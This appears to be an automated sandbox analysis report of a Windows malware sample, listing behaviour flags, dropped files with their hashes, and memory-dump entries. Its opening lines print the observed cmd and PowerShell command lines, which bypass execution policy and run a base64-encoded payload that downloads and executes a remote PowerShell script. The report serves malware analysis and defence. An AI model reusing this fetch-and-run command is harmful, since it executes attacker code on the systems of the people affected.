C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESABE5.tmpMD5
d7caad440a8e0f1dece3f1df6a9edd79
SHA1d7ff284381c115816759b43f3d9fa7df8e26f358
SHA256c29aa192e220432fd08b810aca67225f6520be61db8773b920a0aaae5861acd2
SHA51275a4a24cf98d2b034e3b81fe50b8910fb7483b4db6f0e8657cfdc7ef3fba0e0932f1ccdc63e70900e47e9ef45cb85de68b78fa9a017035edc2560a6e81bc93ff
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.dllMD5
d18740618b9e089d99a39dd09bf9959d
SHA1df977c9ae75ef10ed16a02f3714eabfae85ae2c8
SHA2569f08a8e40c464fcb0a7da9dcc0aefe01d5d699deb611a9ffc17356c9e7cfba7e
SHA512d3c5261155ab552291dea86171f15d075850f7b7cbda2b8f816aaba7fe20dcc5d051f60a5058d0ee7d1addd589be824490c0936510a2eae14af70ab78b8c0b63
-
\??\c:\Users\Admin\AppData\Local\Temp\hvjt0zup\CSC6AEF796A864D438BCECA6AB8CF2FC.TMPMD5
fad80ee43652ede2b2a925636b6afaf2
SHA11deb52e7c868612d96fe120b219c578935f7dae2
SHA256791a419f2e73a2febcc5d5768fdc09c806ca6899b94f9c59fb0b4fd4bbc4f8cb
SHA512c3a2c5d1c394d4e30abbc6ea82a0c87e3416ad54c94f4692b709a6100157882e12a5dcd5ae2ce3b9b68090eab771118f5b7926f9d45e3f0098ffdbe261d704c9
-
\??\c:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\hvjt0zup\hvjt0zup.cmdlineMD5
8dd7e19d4dfad47dcf67542b35be5a11
SHA156ddc8395bce28584087cfa6ffded7e5476bc00b
SHA256f35634561390ebffbd3ec2d78b6b52c3c3605e0dbe0ceca9b406550519267032
SHA512807716cf1080d19a47bfd4700efbe5c3fc80abcce2ca601a070e0fe7d44c811131d3b92f40c0b1e34fcb59e887b09f143ed5ab7424f6dc4e4387f30730c285ae
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/212-31-0x0000000000000000-mapping.dmp
-
memory/512-43-0x0000000000000000-mapping.dmp
-
memory/896-25-0x0000000000000000-mapping.dmp
-
memory/928-26-0x0000000000000000-mapping.dmp
-
memory/984-1-0x0000000001850000-0x0000000001851000-memory.dmpFilesize
4KB
-
memory/1332-27-0x0000000000000000-mapping.dmp
-
memory/1416-17-0x0000000000000000-mapping.dmp
-
memory/1440-42-0x0000000000000000-mapping.dmp
-
memory/1592-20-0x0000000000000000-mapping.dmp
-
memory/1728-32-0x0000000000000000-mapping.dmp
-
memory/2148-19-0x0000000000000000-mapping.dmp
-
memory/2152-44-0x0000000000000000-mapping.dmp
-
memory/2152-18-0x0000000000000000-mapping.dmp
-
memory/2200-35-0x0000000000000000-mapping.dmp
-
memory/2284-24-0x0000000000000000-mapping.dmp
-
memory/2424-7-0x0000000000000000-mapping.dmp
-
memory/2560-39-0x0000000000000000-mapping.dmp
-
memory/3076-21-0x0000000000000000-mapping.dmp
-
memory/3116-33-0x0000000000000000-mapping.dmp
-
memory/3156-5-0x0000015B76000000-0x0000015B76001000-memory.dmpFilesize
4KB
-
memory/3156-3-0x00007FF81FB40000-0x00007FF82052C000-memory.dmpFilesize
9.9MB
-
memory/3156-4-0x0000015B5B9E0000-0x0000015B5B9E1000-memory.dmpFilesize
4KB
-
memory/3156-2-0x0000000000000000-mapping.dmp
-
memory/3156-14-0x0000015B75F80000-0x0000015B75F81000-memory.dmpFilesize
4KB
-
memory/3296-38-0x0000000000000000-mapping.dmp
-
memory/3488-50-0x0000000000000000-mapping.dmp
-
memory/3500-23-0x0000000000000000-mapping.dmp
-
memory/3512-36-0x0000000000000000-mapping.dmp
-
memory/3776-41-0x0000000000000000-mapping.dmp
-
memory/3796-22-0x0000000000000000-mapping.dmp
-
memory/3808-15-0x0000000000000000-mapping.dmp
-
memory/3888-51-0x0000000000000000-mapping.dmp
-
memory/3924-34-0x0000000000000000-mapping.dmp
-
memory/3944-37-0x0000000000000000-mapping.dmp
-
memory/3984-16-0x0000000000000000-mapping.dmp
-
memory/3996-30-0x0000000000000000-mapping.dmp
-
memory/4032-40-0x0000000000000000-mapping.dmp
-
memory/4072-45-0x0000000000000000-mapping.dmp
-
memory/4072-46-0x00007FF81FB40000-0x00007FF82052C000-memory.dmpFilesize
9.9MB
-
memory/4088-10-0x0000000000000000-mapping.dmp